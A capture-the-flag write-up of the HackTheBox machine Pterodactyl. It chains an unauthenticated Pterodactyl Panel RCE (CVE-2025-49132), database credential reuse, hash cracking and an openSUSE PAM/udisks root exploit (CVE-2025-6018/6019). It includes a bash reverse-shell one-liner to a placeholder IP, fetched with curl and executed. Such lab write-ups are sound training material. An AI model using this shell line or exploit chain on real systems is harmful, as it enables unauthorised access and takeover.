HackTheBox: Pterodactyl

OS: Linux
Difficulty: Medium
Review: 4/5

Description:

Pterodactyl is a medium-difficulty Linux machine that runs Pterodactyl Panel on the panel virtual host. The Panel is vulnerable to CVE-2025-49132, an unauthenticated Remote Code Execution vulnerability in the locales/locale.json endpoint. This endpoint accepts user-controlled locale and namespace parameters and uses them to dynamically require the resulting PHP file. The attacker can chain this with PHP’s bundled pearcmd.php to write an arbitrary PHP file and gain command execution as the wwwrun user. The same bug also leaks the Panel’s database credentials from config/database.php. Although a public PoC exists, it requires a small tweak to match the target’s PEAR installation path for successful exploitation. The leaked database credentials are reused against the local MariaDB instance to dump the users table, exposing a bcrypt hash for phileasfogg3. The hash is cracked offline with John the Ripper, and the recovered password is reused for SSH access. For privilege escalation, the attacker abuses the chained OpenSUSE 15 LPE published by Qualys (CVE-2025-6018 and CVE-2025-6019). By forging XDG_SEAT and XDG_VTNR environment variable overrides within .pam_environment, the attacker gains allow_active polkit rights. These privileges allow triggering a udisks XFS resize on an attacker-controlled image, resulting in a root-owned SUID bash binary being written to the disk.

Recon:

As everyone can guess, we are starting out with a Rustscan:

rustscan -a $IP -n --ulimit 70000 -t 5000 -- -A -Pn
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.6 (protocol 2.0)
| ssh-hostkey:
|   256 a3741ea3ad02140100e6abb4188416e0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOouXDOkVrDkob+tyXJOHu3twWDqor3xlKgyYmLIrPasaNjhBW/xkGT2otP1zmnkTUyGfzEWZGkZB2Jkaivmjgc=
|   256 65c833177ad6523d63c3e4a960642dcc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJTXNuX5oJaGQJfvbga+jM+14w5ndyb0DN0jWJHQCDd9
80/tcp open  http    syn-ack nginx 1.21.5
|_http-server-header: nginx/1.21.5
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Did not follow redirect to http://pterodactyl.htb/

Based on the output, this is looking to be a web box, which will mean a foothold gained through information disclosure or exploitation. Before we go further, we can add the redirected domain to our local hosts file.

Pterodactyl.htb

Heading to the site, we see a Minecraft server, which we can also add to the /etc/hosts file for further enumeration.

Checking Wappalyzer, we can see some of the underlying technology stack, which can be annotated for later.

FFuF:

With the basic recon complete, we can start fuzzing the endpoint to gather some data.

Based on the FFuF output, we can add another VHost:

Looking at the discovered files, we can see one of note: changelog.txt.

From this output, we can see a panel version, for which we also have the VHost, which makes this worth looking into further.

CVE-2025-49132 + Initial Access:

Our research into this panel version showed a CVE present with RCE:

CVE-2025-49132: CVE-2025-49132: Pterodactyl Panel RCE Critical - CVE Database | Miggo | Miggo

Pterodactyl Panel path traversal in the localization API triggers unauthenticated remote code execution via crafted locale and namespace query parameters.

Book a Demo

Digging into this further, we found a PoC below, which, when attempting to use, had been failing.

GitHub - GRodolphe/CVE-2025-49132_poc: This is an improved version of the CVE-2025-49132 proof of concept exploit.

This is an improved version of the CVE-2025-49132 proof of concept exploit. - GRodolphe/CVE-2025-49132_poc

GitHubGRodolphe

After a bit of modification, thanks to AI, we got a working PoC:

With the new version, we can see we now have RCE.

With RCE, we can now get ourselves a reverse shell:

1. Create a bash file, rev.sh, and host it via updog.

cat rev.sh

/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/443 0>&1"

2. Start a Penelope listener.

3. Curl and execute our file to gain a shell.

Low Level Access:

After some enumeration, I found that I was able to use the panel credentials to gain access to the MySQL database, which allowed for the discovery of password hashes that I could crack offline to gain access to phileasfogg3.

I could then use su or SSH to obtain a shell as this user.

This part had me quite flustered, as I originally went down a rabbit hole with MySQL credentials for a while before taking a break.

However, after some more enumeration, we can see the version of Linux running is openSUSE Leap 15.6.

This specific version is also vulnerable to CVE-2025-6019.

https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt

Privilege Escalation via CVE-2025-6019:

Some more research led me to find this PoC, which we will use to privilege escalate:

GitHub - guinea-offensive-security/CVE-2025-6019

Contribute to guinea-offensive-security/CVE-2025-6019 development by creating an account on GitHub.

GitHubguinea-offensive-security

1. Create a local xfs.image and transfer the image and exploit to the target.

2. Remove mkfs.xfs from the exploit code, as it will cause the PoC to fail since the host does not have this present.

3. Run the exploit with the -c flag targeting our image to gain a root shell.